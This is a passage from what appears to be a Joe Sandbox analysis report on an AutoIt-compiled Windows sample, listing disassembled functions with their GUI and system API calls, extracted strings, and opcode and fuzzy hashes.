                                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                          • API String ID: 2907320926-4222207086
                                                          • Opcode ID: 5cd4a0fb2c4db0fab75ae753ea66cdd16716ff8e488d43852544d8e6a798b22f
                                                          • Instruction ID: b476c6b30b9b74e39268abab3baab9b610e298dac86e25211a971fbce3013bf8
                                                          • Opcode Fuzzy Hash: 5cd4a0fb2c4db0fab75ae753ea66cdd16716ff8e488d43852544d8e6a798b22f
                                                          • Instruction Fuzzy Hash: 1F5183B6648A099FCB0BDB10CD92DBDB3F5EB067007204556FA06AB691CB71ED41DB83
                                                          Function 00346A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: __wcsnicmp
                                                          • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                          • API String ID: 1038674560-86951937
                                                          • Opcode ID: 29d8118a7392948b80f0aba6393c2312abe45d0dbac789dee0bbdeafb52927bb
                                                          • Instruction ID: 0c27a51e47f64ab2363ee03f0c5aece8fb03a747f44e3410c686b349f209af7e
                                                          • Opcode Fuzzy Hash: 29d8118a7392948b80f0aba6393c2312abe45d0dbac789dee0bbdeafb52927bb
                                                          • Instruction Fuzzy Hash: 0381F871600605ABDB27AF61CC83FAF77E8EF16700F048025F945AE197EB64EE51C6A1
                                                          Function 003C9A4E Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 003C9B04
                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 003C9BBD
                                                          • SendMessageW.USER32(?,00001102,00000002,?), ref: 003C9BD9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window
                                                          • String ID: 0
                                                          • API String ID: 2326795674-4108050209
                                                          • Opcode ID: c6c2e4e1ec7005580bbd2a937a6e7d329af26d0c12f731c7227f2b08395c9c30
                                                          • Instruction ID: 3c14017427e2d8433f4ab4e1e5f7773f9b89dd802565963388d0ad218f91b9b6
                                                          • Opcode Fuzzy Hash: c6c2e4e1ec7005580bbd2a937a6e7d329af26d0c12f731c7227f2b08395c9c30
                                                          • Instruction Fuzzy Hash: 8E02CC31108201AFDB26CF24C848FAABBE9FF49355F06852EF995D62A1C734DD54CB92
                                                          Function 003CA8FC Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetSysColor.USER32(00000012), ref: 003CA935
                                                          • SetTextColor.GDI32(?,?), ref: 003CA939
                                                          • GetSysColorBrush.USER32(0000000F), ref: 003CA94F
                                                          • GetSysColor.USER32(0000000F), ref: 003CA95A
                                                          • CreateSolidBrush.GDI32(?), ref: 003CA95F
                                                          • GetSysColor.USER32(00000011), ref: 003CA977
                                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 003CA985
                                                          • SelectObject.GDI32(?,00000000), ref: 003CA996
                                                          • SetBkColor.GDI32(?,00000000), ref: 003CA99F
                                                          • SelectObject.GDI32(?,?), ref: 003CA9AC
                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 003CA9CB
                                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003CA9E2
                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 003CA9F7
                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003CAA1F
                                                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 003CAA46
                                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 003CAA64
                                                          • DrawFocusRect.USER32(?,?), ref: 003CAA6F
                                                          • GetSysColor.USER32(00000011), ref: 003CAA7D
                                                          • SetTextColor.GDI32(?,00000000), ref: 003CAA85
                                                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 003CAA99
                                                          • SelectObject.GDI32(?,003CA62C), ref: 003CAAB0
                                                          • DeleteObject.GDI32(?), ref: 003CAABB
                                                          • SelectObject.GDI32(?,?), ref: 003CAAC1
                                                          • DeleteObject.GDI32(?), ref: 003CAAC6
                                                          • SetTextColor.GDI32(?,?), ref: 003CAACC
                                                          • SetBkColor.GDI32(?,?), ref: 003CAAD6
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                          • String ID:
                                                          • API String ID: 1996641542-0
                                                          • Opcode ID: 423bf8cd67e2a8a9e353a4506ee23f87ba238787b7f33ad2d519adcc8a476e33
                                                          • Instruction ID: fb8432c4a3c398fb4dbad905a046a75e47e134c739e06741c6ce6dd969cf6b50
                                                          • Opcode Fuzzy Hash: 423bf8cd67e2a8a9e353a4506ee23f87ba238787b7f33ad2d519adcc8a476e33
                                                          • Instruction Fuzzy Hash: 30513C71900608FFDB129FA4DC49EAE7B7AEB08320F154625F911EB2A1D771AD40DF90
                                                          Function 003C8A07 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 003C8AF3
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003C8B04
                                                          • CharNextW.USER32(0000014E), ref: 003C8B33
                                                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 003C8B74
                                                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 003C8B8A
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003C8B9B
                                                          • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 003C8BB8
                                                          • SetWindowTextW.USER32(?,0000014E), ref: 003C8C0A
                                                          • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 003C8C20
                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 003C8C51
                                                          • _memset.LIBCMT ref: 003C8C76
                                                          • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 003C8CBF
                                                          • _memset.LIBCMT ref: 003C8D1E
                                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 003C8D48
                                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 003C8DA0
                                                          • SendMessageW.USER32(?,0000133D,?,?), ref: 003C8E4D
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 003C8E6F
                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003C8EB9
                                                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003C8EE6
                                                          • DrawMenuBar.USER32(?), ref: 003C8EF5
                                                          • SetWindowTextW.USER32(?,0000014E), ref: 003C8F1D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                          • String ID: 0
                                                          • API String ID: 1073566785-4108050209
                                                          • Opcode ID: 570ea2b1633e73e416297c40bf8df71957d23a2cfc82fb236d789b6c100e10eb
                                                          • Instruction ID: 199554519a13348e8ada6ec2d4ffe2d96a0dbb460238fcd1bdf71c1615d455c7
                                                          • Opcode Fuzzy Hash: 570ea2b1633e73e416297c40bf8df71957d23a2cfc82fb236d789b6c100e10eb
                                                          • Instruction Fuzzy Hash: 09E15A75901208AEDF229F64DC84FEE7BB9EF05750F10816AF915EA290DB709E81DF60
                                                          Function 003C48F8 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCursorPos.USER32(?), ref: 003C4A33
                                                          • GetDesktopWindow.USER32 ref: 003C4A48
                                                          • GetWindowRect.USER32(00000000), ref: 003C4A4F
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 003C4AB1
                                                          • DestroyWindow.USER32(?), ref: 003C4ADD
                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 003C4B06
                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003C4B24
                                                          • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 003C4B4A
                                                          • SendMessageW.USER32(?,00000421,?,?), ref: 003C4B5F
                                                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 003C4B72
                                                          • IsWindowVisible.USER32(?), ref: 003C4B92
                                                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 003C4BAD
                                                          • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 003C4BC1
                                                          • GetWindowRect.USER32(?,?), ref: 003C4BD9
                                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 003C4BFF
                                                          • GetMonitorInfoW.USER32(00000000,?), ref: 003C4C19
                                                          • CopyRect.USER32(?,?), ref: 003C4C30
                                                          • SendMessageW.USER32(?,00000412,00000000), ref: 003C4C9B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                          • String ID: ($0$tooltips_class32
                                                          • API String ID: 698492251-4156429822
                                                          • Opcode ID: cadee9cb454fdc3ac9930898a3f3b286f0601f6057c23ff8994156b34800d81b
                                                          • Instruction ID: 8b0b3a4fb8bd61aba6a43e98f6c35c3e77b783436a862dac69a258d104f00a2f
                                                          • Opcode Fuzzy Hash: cadee9cb454fdc3ac9930898a3f3b286f0601f6057c23ff8994156b34800d81b
                                                          • Instruction Fuzzy Hash: 6BB13671604341AFDB06DF24C899F6ABBE9BB88310F00891DF599DB2A1DB71EC04CB95
                                                          Function 003A44DB Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetFileVersionInfoSizeW.VERSION(?,?), ref: 003A44ED
                                                          • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 003A4513
                                                          • _wcscpy.LIBCMT ref: 003A4541
                                                          • _wcscmp.LIBCMT ref: 003A454C
                                                          • _wcscat.LIBCMT ref: 003A4562
                                                          • _wcsstr.LIBCMT ref: 003A456D
                                                          • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 003A4589
                                                          • _wcscat.LIBCMT ref: 003A45D2
                                                          • _wcscat.LIBCMT ref: 003A45D9
                                                          • _wcsncpy.LIBCMT ref: 003A4604
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                          • API String ID: 699586101-1459072770
                                                          • Opcode ID: c901b08a9dddda0bd56478d8f9a60d0fcec599aa258176658cc16a5b9b3b6a10
                                                          • Instruction ID: 4327ed3a440312c630fde8d5530627a99653741195ea4bb1a35511e1cc6f66fd
                                                          • Opcode Fuzzy Hash: c901b08a9dddda0bd56478d8f9a60d0fcec599aa258176658cc16a5b9b3b6a10
                                                          • Instruction Fuzzy Hash: 7D410772A00204BFDB17AB749C47EFF776CDF42710F04806AF905EA192EB759A0197A9
                                                          Function 003427D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003428BC
                                                          • GetSystemMetrics.USER32(00000007), ref: 003428C4
                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003428EF
                                                          • GetSystemMetrics.USER32(00000008), ref: 003428F7
                                                          • GetSystemMetrics.USER32(00000004), ref: 0034291C
                                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00342939
                                                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00342949
                                                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0034297C
                                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00342990
                                                          • GetClientRect.USER32(00000000,000000FF), ref: 003429AE
                                                          • GetStockObject.GDI32(00000011), ref: 003429CA
                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 003429D5
                                                            • Part of subcall function 00342344: GetCursorPos.USER32(?), ref: 00342357
                                                            • Part of subcall function 00342344: ScreenToClient.USER32(004057B0,?), ref: 00342374
                                                            • Part of subcall function 00342344: GetAsyncKeyState.USER32(00000001), ref: 00342399
                                                            • Part of subcall function 00342344: GetAsyncKeyState.USER32(00000002), ref: 003423A7
                                                          • SetTimer.USER32(00000000,00000000,00000028,00341256), ref: 003429FC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                          • String ID: AutoIt v3 GUI
                                                          • API String ID: 1458621304-248962490
                                                          • Opcode ID: 846ba54200fbf112bdeab37f1469600d3307307622e09d01253a972ec3f8f0b7
                                                          • Instruction ID: 763427483176c06fdf0f1170a84aafad799af8640209dd463e8acec912b7e4c5
                                                          • Opcode Fuzzy Hash: 846ba54200fbf112bdeab37f1469600d3307307622e09d01253a972ec3f8f0b7
                                                          • Instruction Fuzzy Hash: 55B16D71600209DFDB16DFA8DC45BAE7BB9FB48310F518129FA15EB290DB74A850CF54
                                                          Function 0039A844 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetClassNameW.USER32(?,?,00000100), ref: 0039A885
                                                          • __swprintf.LIBCMT ref: 0039A926
                                                          • _wcscmp.LIBCMT ref: 0039A939
                                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0039A98E
                                                          • _wcscmp.LIBCMT ref: 0039A9CA
                                                          • GetClassNameW.USER32(?,?,00000400), ref: 0039AA01
                                                          • GetDlgCtrlID.USER32(?), ref: 0039AA53
                                                          • GetWindowRect.USER32(?,?), ref: 0039AA89
                                                          • GetParent.USER32(?), ref: 0039AAA7
                                                          • ScreenToClient.USER32(00000000), ref: 0039AAAE
                                                          • GetClassNameW.USER32(?,?,00000100), ref: 0039AB28
                                                          • _wcscmp.LIBCMT ref: 0039AB3C
                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 0039AB62
                                                          • _wcscmp.LIBCMT ref: 0039AB76
                                                            • Part of subcall function 003637AC: _iswctype.LIBCMT ref: 003637B4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                          • String ID: %s%u
                                                          • API String ID: 3744389584-679674701
                                                          • Opcode ID: 158b9e7ab05960634fefa9cd8062a8b8ba31248edafa03bd42906687f07d2680
                                                          • Instruction ID: 7cc778ca7b3bb23415bf8cefacae852e05b7eadaa65a56e3fefdeda6727bf61f
                                                          • Opcode Fuzzy Hash: 158b9e7ab05960634fefa9cd8062a8b8ba31248edafa03bd42906687f07d2680
                                                          • Instruction Fuzzy Hash: 69A1C072204B06AFDB16DF24C884FAAB7E9FF04354F118629F999C6190DB30E955CBD2
                                                          Function 0039B196 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetClassNameW.USER32(00000008,?,00000400), ref: 0039B1DA
                                                          • _wcscmp.LIBCMT ref: 0039B1EB
                                                          • GetWindowTextW.USER32(00000001,?,00000400), ref: 0039B213
                                                          • CharUpperBuffW.USER32(?,00000000), ref: 0039B230
                                                          • _wcscmp.LIBCMT ref: 0039B24E
                                                          • _wcsstr.LIBCMT ref: 0039B25F
                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 0039B297
                                                          • _wcscmp.LIBCMT ref: 0039B2A7
                                                          • GetWindowTextW.USER32(00000002,?,00000400), ref: 0039B2CE
                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 0039B317
                                                          • _wcscmp.LIBCMT ref: 0039B327
                                                          • GetClassNameW.USER32(00000010,?,00000400), ref: 0039B34F
                                                          • GetWindowRect.USER32(00000004,?), ref: 0039B3B8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                          • String ID: @$ThumbnailClass
                                                          • API String ID: 1788623398-1539354611
                                                          • Opcode ID: 4c7902b445e3a286f0a86f891a85eabf50d007f89768d55fad0a082be613c063
                                                          • Instruction ID: c03cb24c1f7a1365e50dd085ee37f308a124e171d7753a68c4746569d44eaf55
                                                          • Opcode Fuzzy Hash: 4c7902b445e3a286f0a86f891a85eabf50d007f89768d55fad0a082be613c063
                                                          • Instruction Fuzzy Hash: DB818F710083069FDF02DF15DA85FAABBE8EF44314F08856AFD859A0A6DB30ED45CB61
                                                          Function 003CC668 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00342612: GetWindowLongW.USER32(?,000000EB), ref: 00342623
                                                          • DragQueryPoint.SHELL32(?,?), ref: 003CC691
                                                            • Part of subcall function 003CAB69: ClientToScreen.USER32(?,?), ref: 003CAB92
                                                            • Part of subcall function 003CAB69: GetWindowRect.USER32(?,?), ref: 003CAC08
                                                            • Part of subcall function 003CAB69: PtInRect.USER32(?,?,003CC07E), ref: 003CAC18
                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 003CC6FA
                                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 003CC705
                                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 003CC728
                                                          • _wcscat.LIBCMT ref: 003CC758
                                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 003CC76F
                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 003CC788
                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 003CC79F
                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 003CC7C1
                                                          • DragFinish.SHELL32(?), ref: 003CC7C8
                                                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 003CC8BB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pb@
                                                          • API String ID: 169749273-4025947017
                                                          • Opcode ID: ac6dfbd861e76496e72581d04c53925f6f240bc5aebff780c62c67f21e971c47
                                                          • Instruction ID: dd9a246894605456b8958ee28dd951a466b52344521fd18cc839a14633a9bb96
                                                          • Opcode Fuzzy Hash: ac6dfbd861e76496e72581d04c53925f6f240bc5aebff780c62c67f21e971c47
                                                          • Instruction Fuzzy Hash: 24615271508300AFC702EF64DC85E9FBBE9EF88710F00092EF5959B1A1DB70A949CB52
                                                          Function 0039AFDF Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: __wcsnicmp
                                                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                          • API String ID: 1038674560-1810252412
                                                          • Opcode ID: 13d747525f8170e4cc99f49de0ac78e0279b4d2f720bacfbb0176e19facafbca
                                                          • Instruction ID: 3b8e7adda0fff271de1fe216589adfc74fd8f77006de207e216592c417cafb18
                                                          • Opcode Fuzzy Hash: 13d747525f8170e4cc99f49de0ac78e0279b4d2f720bacfbb0176e19facafbca
                                                          • Instruction Fuzzy Hash: 9B31AE31A48209A6DF27EA60DE43EFFB7B89F10B10F210129F551792E6EF616F14C651
                                                          Function 0039C2C0 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadIconW.USER32(00000063), ref: 0039C2D3
                                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0039C2E5
                                                          • SetWindowTextW.USER32(?,?), ref: 0039C2FC
